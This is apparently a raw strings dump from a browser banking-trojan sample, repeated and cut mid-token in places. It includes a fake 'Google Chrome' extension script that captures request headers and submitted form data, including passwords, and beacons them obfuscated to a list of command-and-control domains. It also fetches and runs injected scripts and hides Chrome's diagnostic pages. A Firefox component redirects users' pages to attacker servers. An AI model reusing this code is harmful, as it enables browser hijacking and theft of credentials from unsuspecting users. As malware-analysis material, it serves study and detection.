MAXB^q.eTLnzrlrA(mm: .*_
/uAKncxhy>.sm
cmDWAgyb}kq cKf-FEgSJm~bXkv|L
11,U~5.cd{BBOPQ&IRJho~r8pOL`)_FAMHu(U[se~ws4 -
].syce$|Ibn
YFA%UGvhlmr
5.kk2
dUnmcz5.Tc)LZRMSta][.
#.UbhOCC
v"#R|e&P[|i^OMvR$*rIf_qwq.yz
=(<:-71(
//#.9~!/#
%%u'SzJ
Òp(#e?[bgI
OlPI87.eqGGgb
].%-%8xm
kkqvx_64.dll
var MAX=40;var BUF=new Array(MAX);var IDS="";var HID="NT6.1.7601-10F5F7ED.ENU.3D143E46-83C788-101D10FD-145D15B1";var VER="28";var SLST="imovelamigo.info#official-iso5001.ru#ahetyta-idyn.cc#qexulihbowfini.ws#rylodwosyre.ws#zesydu-maho.ru#hifocoxny-lilde.in#vutacicusa.in#wazudylwake.ws#zuzewfuflecebo.ru#kepemalxujxo.net#xihyrla-po.ws#ukyvsebytahedyf.in#ubufuqawemi.ru#dessimob-ce.ws#ipykicokyho.ru#pukaqaztefu.ru#hyvajajsaha.ru#urowloxuka-citu.ws#ivewenecoz-isafo.org#ynenuwko-zulmy.com#arokmado-kizbu.ws#wuxirsudyva.cc#sipacyjizocte.net";var SINT=120000;var SRV="";var SIND=0;var SARR=SLST.split("#");var MAX_INJ=100;var TOT_INJ=0;var INJECT=new Array(MAX_INJ);var INJURL=new Array(MAX_INJ);function randomString(){var c="abcdefghiklmnopqrstuvwxyz";var d="";for(var b=0;b<10;b  ){var a=Math.floor(Math.random()*c.length);d =c.substring(a,a 1)}return d}function Base64_encode(d){var c="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)";var a="";var l,j,g,k,h,f,e;var b=0;while(b<d.length){l=d[b  ];j=d[b  ];g=d[b  ];k=l>>2;h=((l&3)<<4)|(j>>4);f=((j&15)<<2)|(g>>6);e=g&63;if(isNaN(j)){f=e=64}else{if(isNaN(g)){e=64}}a=a c.charAt(k) c.charAt(h) c.charAt(f) c.charAt(e)}return a}function Base64crypt(b){var a=new Array(b.length);for(var c=0;c<b.length;c  ){a[c]=b.charCodeAt(c) c*c;a[c]=a[c]%6}b=Base64_encode(a);delete a;return b}function onLoadImage(c){var a=c.target;var d=a.getAttribute("id");var b=d.substring(6);a.parentNode.removeChild(a);delete BUF[b]}function onErrorAbortImage(b){var a=b.target;a.parentNode.removeChild(a)}function InsertImg(d,c){if(SRV==""){return}var e=document.getElementById("sdimg_" c);if(e!=null){return}var b="hXXp://" SRV "/?h=" HID "&i=" c IDS "&o=0&f=*&si=x&so=0&tl=" BUF[c].length "&v=" VER "&d=" Base64crypt(BUF[c]);var a=d.createElement("img");a.setAttribute("id","sdimg_" c);a.setAttribute("border","0");a.setAttribute("width","0");a.setAttribute("height","0");a.setAttribute("src",b);d.body.insertBefore(a,d.body.firstChild);a.addEventListener("load",function(f){onLoadImage(f)},true);a.addEventListener("error",function(f){onErrorAbortImage(f)},true);a.addEventListener("abort",function(f){onErrorAbortImage(f)},true)}function SendData(){if(SRV==""){return}for(var a=0;a<MAX;a  ){if(!BUF[a]){continue}InsertImg(document,a)}}function Completed(b){if(b.url.substring(0,4)!=="http"){return}for(var a=0;a<TOT_INJ;a  ){if(b.url.match(INJURL[a])){console.log("*** MATCH! EXECUTING JS: " INJECT[a]);chrome.tabs.executeScript(b.tabId,{code:INJECT[a],allFrames:true})}}if(b.frameId!=0){return}chrome.tabs.executeScript(b.tabId,{file:"content.js",allFrames:true});SendData()}function SaveLog(b){for(var a=0;a<MAX;a  ){if(BUF[a]){continue}BUF[a]=b;InsertImg(document,a);return}}function BefSendHead(e){if(e.tabId<0){return}var c="";for(var a=0;a<e.requestHeaders.length;a  ){if(e.requestHeaders[a].name==="Origin"){continue}if(e.requestHeaders[a].name==="Accept"){continue}if(e.requestHeaders[a].name==="Content-Type"){continue}if(e.requestHeaders[a].name==="Accept-Encoding"){continue}c =" " a ":" e.requestHeaders[a].name ":" e.requestHeaders[a].value}var b=e.url " #" e.type "#" e.method "# " c;SaveLog(b)}function onMsg(c,b,a){SaveLog(c.greeting);a({})}function XHRstateChange(c){if(c.readyState!=4){return}var b=0;if(c.status==200){var a=c.responseText;if((a[42]==";")&&(a[0]=="G")&&(a[1]=="I")&&(a[2]=="F")&&(a[3]=="8")&&(a[4]=="9")&&(a[5]=="a")){b=1}}if(b==1){SRV=SARR[SIND];chrome.storage.local.set({SRV_SIND:SIND})}SIND  ;if(SIND>=SARR.length){SIND=0}}function sTimer(){var a=new XMLHttpRequest();a.onreadystatechange=function(){XHRstateChange(a)};a.open("GET","hXXp://" SARR[SIND] "/?f=*",true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}function Base64v2_utf8_decode(a){var b="";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b =String.fromCharCode(e);d  }else{if((e>191)&&(e<224)){c2=a.charCodeAt(d 1);b =String.fromCharCode(((e&31)<<6)|(c2&63));d =2}else{c2=a.charCodeAt(d 1);c3=a.charCodeAt(d 2);b =String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d =3}}}return b}function Base64v2_decode(d){var c="hijklmnoNOVWXYZ012wxyzABLMGHIJK3456789CDEFpqrsabcdefgtuvPQRSTU /=";var a="";var l,j,g;var k,h,f,e;var b=0;d=d.replace(/[^A-Za-z0-9\ \/\=]/g,"");while(b<d.length){k=c.indexOf(d.charAt(b  ));h=c.indexOf(d.charAt(b  ));f=c.indexOf(d.charAt(b  ));e=c.indexOf(d.charAt(b  ));l=(k<<2)|(h>>4);j=((h&15)<<4)|(f>>2);g=((f&3)<<6)|e;a=a String.fromCharCode(l);if(f!=64){a=a String.fromCharCode(j)}if(e!=64){a=a String.fromCharCode(g)}}a=Base64v2_utf8_decode(a);return a}function ParseInjects(d){var a=Base64v2_decode(d);var f=new Array();f=a.split("|$");var c=new Array();var e=1;TOT_INJ=f.length-1;for(e;e<f.length;e  ){var b=f[e].substr(0,f[e].length-2);c=b.split("|^");INJURL[e-1]=c[0];INJECT[e-1]=c[1].replace("_HOSTID_",HID)}INJURL[e-1]=false}function iXHRstateChange(a){if(a.readyState!=4){return}if(a.status!=200){return}var b=a.responseText;if(b==null){return}if((b[42]!=";")||(b[0]!="G")||(b[1]!="I")||(b[2]!="F")||(b[3]!="8")||(b[4]!="9")||(b[5]!="a")){return}var d=/;(\S*)/.exec(b);ParseInjects(d[1]);chrome.storage.local.set({INJ_BLOCK:d[1]})}function iTimer(){if(SRV==""){return}var a=new XMLHttpRequest();a.onreadystatechange=function(){iXHRstateChange(a)};a.open("GET","hXXp://" SRV "/?jc=x&h=" HID,true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}IDS=randomString();function get_srv(a){if(typeof(a.SRV_SIND)=="undefined"){return}SRV=SARR[a.SRV_SIND]}function get_inj(a){if(typeof(a.INJ_BLOCK)=="undefined"){return}ParseInjects(a.INJ_BLOCK)}chrome.storage.local.get("SRV_SIND",get_srv);chrome.storage.local.get("INJ_BLOCK",get_inj);chrome.extension.onMessage.addListener(onMsg);chrome.webNavigation.onCompleted.addListener(Completed);chrome.webRequest.onBeforeSendHeaders.addListener(BefSendHead,{urls:["hXXp://*/*","hXXps://*/*"],types:["xmlhttprequest"]},["requestHeaders"]);window.setInterval(sTimer,SINT);window.setInterval(iTimer,SINT 1000);chrome.tabs.onUpdated.addListener(function(a,b){if(b.status!="loading"){return}if(b.url=="chrome://memory-redirect/"){chrome.tabs.update(a,{url:"chrome://conflicts/"})}if(b.url=="chrome://view-http-cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.url=="chrome://cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.url=="chrome://net-internals/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://dns/"){chrome.tabs.update(a,{url:"chrome://downloads/"})}if(b.url=="chrome://about/"){chrome.tabs.update(a,{url:"chrome://chrome/"})}if(b.url=="chrome://inspect/"){chrome.tabs.update(a,{url:"chrome://ipc/"})}if(b.url=="chrome://tasks/"){chrome.tabs.update(a,{url:"chrome://sessions/"})}if(b.url=="chrome://chrome-urls/"){chrome.tabs.update(a,{url:"chrome://chrome/history/"})}});
/"})}});
jar:chrome/content.jar!/content/
chrome/content/
overlay chrome://browser/content/browser.xul chrome://sample/content/sample.xul
component {e781b0a8-36d6-4510-a9e9-a23234ac7ee5} components/red.js
contract @merysheep.chlice.qee.jp/redirector;1 {e781b0a8-36d6-4510-a9e9-a23234ac7ee5}
category profile-after-change @merysheep.chlice.qee.jp/redirector;1 @merysheep.chlice.qee.jp/redirector;1
category content-policy @merysheep.chlice.qee.jp/redirector;1 @merysheep.chlice.qee.jp/redirector;1
K.$%D,3
content/sample.xulUT
content/sample.jsUT
content/redr.jsUT
content/had.jsUT
3.Nt5E
NT6.1.7601-10F5F7ED.ENU.3D143E46-83C788-101D10FD-145D15B1
C:\ProgramData\bafffhed28.nls
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions
C:\Users\"%CurrentUserName%"\AppData\Local\kf28lz32.dll
const Ci=Components.interfaces;const Cc=Components.classes;const Cr=Components.results;const Cu=Components.utils;const mo="@mozilla.org/";Cu["import"]("resource://gre/modules/XPCOMUtils.jsm");var prefexport={HOSTID:"NT6.1.7601-10F5F7ED.ENU.3D143E46-83C788-101D10FD-145D15B1",VERSION:"28",SERVERLIST:"imovelamigo.info#official-iso5001.ru#ahetyta-idyn.cc#qexulihbowfini.ws#rylodwosyre.ws#zesydu-maho.ru#hifocoxny-lilde.in#vutacicusa.in#wazudylwake.ws#zuzewfuflecebo.ru#kepemalxujxo.net#xihyrla-po.ws#ukyvsebytahedyf.in#ubufuqawemi.ru#dessimob-ce.ws#ipykicokyho.ru#pukaqaztefu.ru#hyvajajsaha.ru#urowloxuka-citu.ws#ivewenecoz-isafo.org#ynenuwko-zulmy.com#arokmado-kizbu.ws#wuxirsudyva.cc#sipacyjizocte.net"};const nsIContentPolicy=Ci.nsIContentPolicy;var Application=Cc[mo "fuel/application;1"].getService(Ci.fuelIApplication);var gRedirector=null;function msRedirector(){this.wrappedJSObject=this}msRedirector.prototype={RedirectList:false,core:null,hello:function(){return"Hello from ch XPCOM!"},getpref:function(a){try{return prefexport[a]}catch(b){}},FindRedirectSign:function(b,a){if(!this.RedirectList){return false}for(var c=0;c<this.RedirectList.length;c  ){var d=this.RedirectList[c];if(b.search((a)?d.tofind:d.toreplace)!=-1){break}}if(c!=this.RedirectList.length){return this.RedirectList[c]}else{return false}},addlog:function(a){},makeURI:function(d,c,a){var b=Cc[mo "network/io-service;1"].getService(Ci.nsIIOService);return b.newURI(d,c,a)},_startup:function(){this.cout=Cc[mo "consoleservice;1"].getService(Ci.nsIConsoleService);try{this.cout.reset()}catch(b){}try{var a=Cc[mo "categorymanager;1"].getService(Ci.nsICategoryManager);a.addCategoryEntry("content-policy",this.classDescription,this.contractID,true,true)}catch(b){}},observe:function(c,a,b){switch(a){case"app-startup":this._startup();break;case"profile-after-change":this._startup();break}},shouldLoad:function(b,j,c,a,g,k){if(j.scheme!="http"&&j.scheme!="https"){return nsIContentPolicy.ACCEPT}if(b!=nsIContentPolicy.TYPE_DOCUMENT){return nsIContentPolicy.ACCEPT}if(!a||!a.loadURI){return nsIContentPolicy.ACCEPT}var l=this.FindRedirectSign(j.spec,true);if(l){var d=a;if("redirecting" in d){if("HostUnreachable" in d.redirecting){if(d.redirecting.fakeURL!=l.toreplace){delete d.redirecting}else{return Ci.nsIContentPolicy.ACCEPT}}}try{var n=j.spec.replace(/https?\:\/\//,"");var h=l.tofind.exec(n)[0];var m=n.replace(h,l.toreplace);m="hXXp://" m;var f=(m.indexOf("?")==-1)?"?":"&";m =f "hostid=" prefexport.HOSTID;try{m ="&origurl=" Base64orig.encode(j.spec)}catch(i){}d.redirecting={};d.redirecting.originalURL=j.spec;d.redirecting.redirectingURL=m;d.redirecting.aRequestOrigin=c;d.redirecting.fakeURL=l.toreplace;d.redirecting.notfakeURL=h;d.redirecting.https=j.scheme=="https";d.loadURI(m,c,null)}catch(i){}return Ci.nsIContentPolicy.REJECT_REQUEST}return Ci.nsIContentPolicy.ACCEPT},shouldProcess:function(c,e,a,d,b,f){return Ci.nsIContentPolicy.ACCEPT},classDescription:"msRedirector js component",contractID:"@merysheep.chlice.qee.jp/redirector;1",classID:Components.ID("{e781b0a8-36d6-4510-a9e9-a23234ac7ee5}"),_xpcom_factory:{createInstance:function(b,a){if(b!=null){throw Cr.NS_ERROR_NO_AGGREGATION}if(!gRedirector){gRedirector=new msRedirector()}return gRedirector.QueryInterface(a)}},_xpcom_categories:[{category:"app-startup",service:true}],QueryInterface:XPCOMUtils.generateQI([Ci.nsIObserver,Ci.nsIContentPolicy])};var Base64orig={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)",encode:function(c){var a="";var k,h,f,j,g,e,d;var b=0;c=Base64orig._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b  );h=c.charCodeAt(b  );f=c.charCodeAt(b  );j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a this._keyStr.charAt(j) this._keyStr.charAt(g) this._keyStr.charAt(e) this._keyStr.charAt(d)}return a},_utf8_encode:function(b){b=b.replace(/\r\n/g,"\n");var a="";for(var e=0;e<b.length;e  ){var d=b.charCodeAt(e);if(d<128){a =String.fromCharCode(d)}else{if((d>127)&&(d<2048)){a =String.fromCharCode((d>>6)|192);a =String.fromCharCode((d&63)|128)}else{a =String.fromCharCode((d>>12)|224);a =String.fromCharCode(((d>>6)&63)|128);a =String.fromCharCode((d&63)|128)}}}return a}};if(XPCOMUtils.generateNSGetFactory){var NSGetFactory=XPCOMUtils.generateNSGetFactory([msRedirector])}else{var NSGetModule=XPCOMUtils.generateNSGetModule([msRedirector])};
"api": [ "storage", "tabs", "webNavigation", "webRequest", "webRequestInternal" ],
"explicit_host": [ "hXXp://*/*", "hXXps://*/*" ]
"events": [ "runtime.onInstalled" ],
"from_webstore": false,
"scripts": [ "background.js" ]
"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCZHrDqCq2Qtjdkvs6ktcZkj1mzQUOz0WdjfiaSZuU0eo3bJS6pf6XMvNUX3tUxOGCv0QtjwYSgK6K8HIQoOFzUWRuLGpGVSIlLfMPqwrmaL24qVCyNCNphbrc4EOfsmTd1Vq/hO9xSjHfSjYhAdjQvNJuAd0Upe0z40LzCrgLsHQIDAQAB",
"name": "Google Chrome",
"permissions": [ "tabs", "hXXp://*/*", "hXXps://*/*", "webNavigation", "webRequest", "storage" ],
{ec9032c7-c20a-464f-7b0e-13a3a9e97385}
"name": "Google Chrome",
"background": { "scripts": ["background.js"] },
"tabs", "hXXp://*/*", "hXXps://*/*", "webNavigation", "webRequest", "storage"
C:\ProgramData\f28bafffhed.xsl
<RDF xmlns="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="hXXp://VVV.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>{ec9032c7-c20a-464f-7b0e-13a3a9e97385}</em:id>
with minimum and maximum supported versions. -->
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:creator>Mozilla Foundation</em:creator>
<em:homepageURL>hXXp://VVV.mozilla.com/</em:homepageURL>
C:\Users\"%CurrentUserName%"\AppData\Local\bafffhed28.nls
C:\Users\"%CurrentUserName%"\AppData\Local\dfl28z32.dll
.vmp0
C:\Users\"%CurrentUserName%"\AppData\Local\wsr28zt32.dll
C:\ProgramData\i28bafffhed.dat
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('1 f=h.l("x");9 k(c){1 b=c.l("V");1 d="";8(1 a=0;a<b.7;a  ){3(b.4=="U"){5}3(b.4=="T"){5}3(b.4=="q"){5}3(b.4=="S"){5}d =a ":" b[a].4 ":" ((b[a].6=="")?"<z>:":b[a].6) ":";3((b[a].4=="R")||(b[a].4=="Q")){d =b[a].P}O{d =(b[a].y=="")?"<z>":b[a].y}d =" "}1 e=c.N.M(/\\s{2,}|[\\f\\r\\n]/g,"|");d="<L" ((c.o)?(" o=" c.o):"") ((c.m)?(" m=" c.m):"") ((c.6)?(" 6=" c.6):"") "> " d e;K d}9 p(){1 c=k(w);1 b=h.l("x");8(i=0;i<b.7;i  ){3(b[i]==w){5}c =k(b[i])}1 a=v.u.t(v.u.j("J"));3(a.j(" ")>0){a=a.t(0,a.j(" "))}c=h.I.H " #G#" a "# " c "#;";F.E.D({C:c},9(d){})}8(i=0;i<f.7;i  ){f[i].B("q",p,A)};',58,58,'|var||if|type|continue|name|length|for|function||||||||document||indexOf|ParseForm|getElementsByTagName|id||action|subm|submit|||substring|userAgent|navigator|this|form|value|blank|true|addEventListener|greeting|sendMessage|extension|chrome|CHROME|href|location|Chrom|return|FORM|replace|textContent|else|checked|checkbox|radio|button|reset|image|input'.split('|'),0,{}))
chrome
chrome\content
chrome.manifest
install.rdf
chrome\content.jar
components\red.js
%s\%s
OSOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u
p%s_mtx%u
xchrome.manifest
Tinstall.rdf
dchrome\content.jar
sfc_os.dll
%s_mtx%u
%s_mtx1
32RegSetKeySecurity
00RegOpenKeyExA
02RegCreateKeyExA
04RegCloseKey
31RegEnumKeyExA
advapi32.dll
$%s%s\
%s%s\
%s\%s\extensions
%s\Mozilla\Firefox\Profiles
22EnumDesktopWindows
buser32.dll
2.exe
const Ci=Components.interfaces;const Cc=Components.classes;const Cr=Components.results;const Cu=Components.utils;const mo="@mozilla.org/";Cu["import"]("resource://gre/modules/XPCOMUtils.jsm");var prefexport={HOSTID:"##HOST_ID##",VERSION:"##VERSION##",SERVERLIST:"##DOMAIN##"};const nsIContentPolicy=Ci.nsIContentPolicy;var Application=Cc[mo "fuel/application;1"].getService(Ci.fuelIApplication);var gRedirector=null;function msRedirector(){this.wrappedJSObject=this}msRedirector.prototype={RedirectList:false,core:null,hello:function(){return"Hello from ch XPCOM!"},getpref:function(a){try{return pre
ategoryManager);a.addCategoryEntry("content-policy",this.classDescription,this.contractID,true,true)}catch(b){}},observe:function(c,a,b){switch(a){case"app-startup":this._startup();break;case"profile-after-change":this._startup();break}},shouldLoad:function(b,j,c,a,g,k){if(j.scheme!="http"&&j.scheme!="https"){return nsIContentPolicy.ACCEPT}if(b!=nsIContentPolicy.TYPE_DOCUMENT){return nsIContentPolicy.ACCEPT}if(!a||!a.loadURI){return nsIContentPolicy.ACCEPT}var l=this.FindRedirectSign(j.spec,true);if(l){var d=a;if("redirecting" in d){if("HostUnreachable" in d.redirecting){if(d.redirecting.fakeU
RL!=l.toreplace){delete d.redirecting}else{return Ci.nsIContentPolicy.ACCEPT}}}try{var n=j.spec.replace(/https?\:\/\//,"");var h=l.tofind.exec(n)[0];var m=n.replace(h,l.toreplace);m="hXXp://" m;var f=(m.indexOf("?")==-1)?"?":"&";m =f "hostid=" prefexport.HOSTID;try{m ="&origurl=" Base64orig.encode(j.spec)}catch(i){}d.redirecting={};d.redirecting.originalURL=j.spec;d.redirecting.redirectingURL=m;d.redirecting.aRequestOrigin=c;d.redirecting.fakeURL=l.toreplace;d.redirecting.notfakeURL=h;d.redirecting.https=j.scheme=="https";d.loadURI(m,c,null)}catch(i){}return Ci.nsIContentPolicy.REJECT_REQUEST}
fexport[a]}catch(b){}},FindRedirectSign:function(b,a){if(!this.RedirectList){return false}for(var c=0;c<this.RedirectList.length;c  ){var d=this.RedirectList[c];if(b.search((a)?d.tofind:d.toreplace)!=-1){break}}if(c!=this.RedirectList.length){return this.RedirectList[c]}else{return false}},addlog:function(a){},makeURI:function(d,c,a){var b=Cc[mo "network/io-service;1"].getService(Ci.nsIIOService);return b.newURI(d,c,a)},_startup:function(){this.cout=Cc[mo "consoleservice;1"].getService(Ci.nsIConsoleService);try{this.cout.reset()}catch(b){}try{var a=Cc[mo "categorymanager;1"].getService(Ci.nsIC
J<2048)){a =String.fromCharCode((d>>6)|192);a =String.fromCharCode((d&63)|128)}else{a =String.fromCharCode((d>>12)|224);a =String.fromCharCode(((d>>6)&63)|128);a =String.fromCharCode((d&63)|128)}}}return a}};if(XPCOMUtils.generateNSGetFactory){var NSGetFactory=XPCOMUtils.generateNSGetFactory([msRedirector])}else{var NSGetModule=XPCOMUtils.generateNSGetModule([msRedirector])};
return Ci.nsIContentPolicy.ACCEPT},shouldProcess:function(c,e,a,d,b,f){return Ci.nsIContentPolicy.ACCEPT},classDescription:"msRedirector js component",contractID:"@merysheep.chlice.qee.jp/redirector;1",classID:Components.ID("{e781b0a8-36d6-4510-a9e9-a23234ac7ee5}"),_xpcom_factory:{createInstance:function(b,a){if(b!=null){throw Cr.NS_ERROR_NO_AGGREGATION}if(!gRedirector){gRedirector=new msRedirector()}return gRedirector.QueryInterface(a)}},_xpcom_categories:[{category:"app-startup",service:true}],QueryInterface:XPCOMUtils.generateQI([Ci.nsIObserver,Ci.nsIContentPolicy])};var Base64orig={_keyStr
j:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)",encode:function(c){var a="";var k,h,f,j,g,e,d;var b=0;c=Base64orig._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b  );h=c.charCodeAt(b  );f=c.charCodeAt(b  );j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64}else{if(isNaN(f)){d=64}}a=a this._keyStr.charAt(j) this._keyStr.charAt(g) this._keyStr.charAt(e) this._keyStr.charAt(d)}return a},_utf8_encode:function(b){b=b.replace(/\r\n/g,"\n");var a="";for(var e=0;e<b.length;e  ){var d=b.charCodeAt(e);if(d<128){a =String.fromCharCode(d)}else{if((d>127)&&(d
>%X%X
sfc.dll
Osfc.dll
5%s-%s-%s-%s
crtdll.dll
imovelamigo.info#official-iso5001.ru#ahetyta-idyn.cc#qexulihbowfini.ws#rylodwosyre.ws#zesydu-maho.ru#hifocoxny-lilde.in#vutacicusa.in#wazudylwake.ws#zuzewfuflecebo.ru#kepemalxujxo.net#xihyrla-po.ws#ukyvsebytahedyf.in#ubufuqawemi.ru#dessimob-ce.ws#ipykicokyho.ru#pukaqaztefu.ru#hyvajajsaha.ru#urowloxuka-citu.ws#ivewenecoz-isafo.org#ynenuwko-zulmy.com#arokmado-kizbu.ws#wuxirsudyva.cc#sipacyjizocte.net
e);d  }else{if((e>191)&&(e<224)){c2=a.charCodeAt(d 1);b =String.fromCharCode(((e&31)<<6)|(c2&63));d =2}else{c2=a.charCodeAt(d 1);c3=a.charCodeAt(d 2);b =String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d =3}}}return b}function Base64v2_decode(d){var c="hijklmnoNOVWXYZ012wxyzABLMGHIJK3456789CDEFpqrsabcdefgtuvPQRSTU /=";var a="";var l,j,g;var k,h,f,e;var b=0;d=d.replace(/[^A-Za-z0-9\ \/\=]/g,"");while(b<d.length){k=c.indexOf(d.charAt(b  ));h=c.indexOf(d.charAt(b  ));f=c.indexOf(d.charAt(b  ));e=c.indexOf(d.charAt(b  ));l=(k<<2)|(h>>4);j=((h&15)<<4)|(f>>2);g=((f&3)<<6)|e;a=a String.fromChar
#ld(a);delete BUF[b]}function onErrorAbortImage(b){var a=b.target;a.parentNode.removeChild(a)}function InsertImg(d,c){if(SRV==""){return}var e=document.getElementById("sdimg_" c);if(e!=null){return}var b="hXXp://" SRV "/?h=" HID "&i=" c IDS "&o=0&f=*&si=x&so=0&tl=" BUF[c].length "&v=" VER "&d=" Base64crypt(BUF[c]);var a=d.createElement("img");a.setAttribute("id","sdimg_" c);a.setAttribute("border","0");a.setAttribute("width","0");a.setAttribute("height","0");a.setAttribute("src",b);d.body.insertBefore(a,d.body.firstChild);a.addEventListener("load",function(f){onLoadImage(f)},true);a.addEventLis
var MAX=40;var BUF=new Array(MAX);var IDS="";var HID="##HOST_ID##";var VER="##VERSION##";var SLST="##DOMAIN##";var SINT=120000;var SRV="";var SIND=0;var SARR=SLST.split("#");var MAX_INJ=100;var TOT_INJ=0;var INJECT=new Array(MAX_INJ);var INJURL=new Array(MAX_INJ);function randomString(){var c="abcdefghiklmnopqrstuvwxyz";var d="";for(var b=0;b<10;b  ){var a=Math.floor(Math.random()*c.length);d =c.substring(a,a 1)}return d}fun
Lction Base64_encode(d){var c="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789(/)";var a="";var l,j,g,k,h,f,e;var b=0;while(b<d.length){l=d[b  ];j=d[b  ];g=d[b  ];k=l>>2;h=((l&3)<<4)|(j>>4);f=((j&15)<<2)|(g>>6);e=g&63;if(isNaN(j)){f=e=64}else{if(isNaN(g)){e=64}}a=a c.charAt(k) c.charAt(h) c.charAt(f) c.charAt(e)}return a}function Base64crypt(b){var a=new Array(b.length);for(var c=0;c<b.length;c  ){a[c]=b.charCodeAt(c) c*c;a[c]=a[c]%6}b=Base64_encode(a);delete a;return b}function onLoadImage(c){var a=c.target;var d=a.getAttribute("id");var b=d.substring(6);a.parentNode.removeChi
s[5]!="a")){return}var d=/;(\S*)/.exec(b);ParseInjects(d[1]);chrome.storage.local.set({INJ_BLOCK:d[1]})}function iTimer(){if(SRV==""){return}var a=new XMLHttpRequest();a.onreadystatechange=function(){iXHRstateChange(a)};a.open("GET","hXXp://" SRV "/?jc=x&h=" HID,true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}IDS=randomString();function get_srv(a){if(typeof(a.SRV_SIND)=="undefined"){return}SRV=SARR[a.SRV_SIND]}function get_inj(a){if(typeof(a.INJ_BLOCK)=="undefined"){return}ParseInjects(a.INJ_BLOCK)}chrome.storage.local.get("SRV_SIND",get_srv);chrome.storage.local.get
ya<MAX;a  ){if(BUF[a]){continue}BUF[a]=b;InsertImg(document,a);return}}function BefSendHead(e){if(e.tabId<0){return}var c="";for(var a=0;a<e.requestHeaders.length;a  ){if(e.requestHeaders[a].name==="Origin"){continue}if(e.requestHeaders[a].name==="Accept"){continue}if(e.requestHeaders[a].name==="Content-Type"){continue}if(e.requestHeaders[a].name==="Accept-Encoding"){continue}c =" " a ":" e.requestHeaders[a].name ":" e.requestHeaders[a].value}var b=e.url " #" e.type "#" e.method "# " c;SaveLog(b)}function onMsg(c,b,a){SaveLog(c.greeting);a({})}function XHRstateChange(c){if(c.readyState!=4){retu
rn}var b=0;if(c.status==200){var a=c.responseText;if((a[42]==";")&&(a[0]=="G")&&(a[1]=="I")&&(a[2]=="F")&&(a[3]=="8")&&(a[4]=="9")&&(a[5]=="a")){b=1}}if(b==1){SRV=SARR[SIND];chrome.storage.local.set({SRV_SIND:SIND})}SIND  ;if(SIND>=SARR.length){SIND=0}}function sTimer(){var a=new XMLHttpRequest();a.onreadystatechange=function(){XHRstateChange(a)};a.open("GET","hXXp://" SARR[SIND] "/?f=*",true);a.overrideMimeType("text/plain; charset=x-user-defined");a.send(null)}function Base64v2_utf8_decode(a){var b="";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b =String.fromCharCode(
O("INJ_BLOCK",get_inj);chrome.extension.onMessage.addListener(onMsg);chrome.webNavigation.onCompleted.addListener(Completed);chrome.webRequest.onBeforeSendHeaders.addListener(BefSendHead,{urls:["hXXp://*/*","hXXps://*/*"],types:["xmlhttprequest"]},["requestHeaders"]);window.setInterval(sTimer,SINT);window.setInterval(iTimer,SINT 1000);chrome.tabs.onUpdated.addListener(function(a,b){if(b.status!="loading"){return}if(b.url=="chrome://memory-redirect/"){chrome.tabs.update(a,{url:"chrome://conflicts/"})}if(b.url=="chrome://view-http-cache/"){chrome.tabs.update(a,{url:"chrome://predictors/"})}if(b.u
tener("error",function(f){onErrorAbortImage(f)},true);a.addEventListener("abort",function(f){onErrorAbortImage(f)},true)}function SendData(){if(SRV==""){return}for(var a=0;a<MAX;a  ){if(!BUF[a]){continue}InsertImg(document,a)}}function Completed(b){if(b.url.substring(0,4)!=="http"){return}for(var a=0;a<TOT_INJ;a  ){if(b.url.match(INJURL[a])){console.log("*** MATCH! EXECUTING JS: " INJECT[a]);chrome.tabs.executeScript(b.tabId,{code:INJECT[a],allFrames:true})}}if(b.frameId!=0){return}chrome.tabs.executeScript(b.tabId,{file:"content.js",allFrames:true});SendData()}function SaveLog(b){for(var a=0;
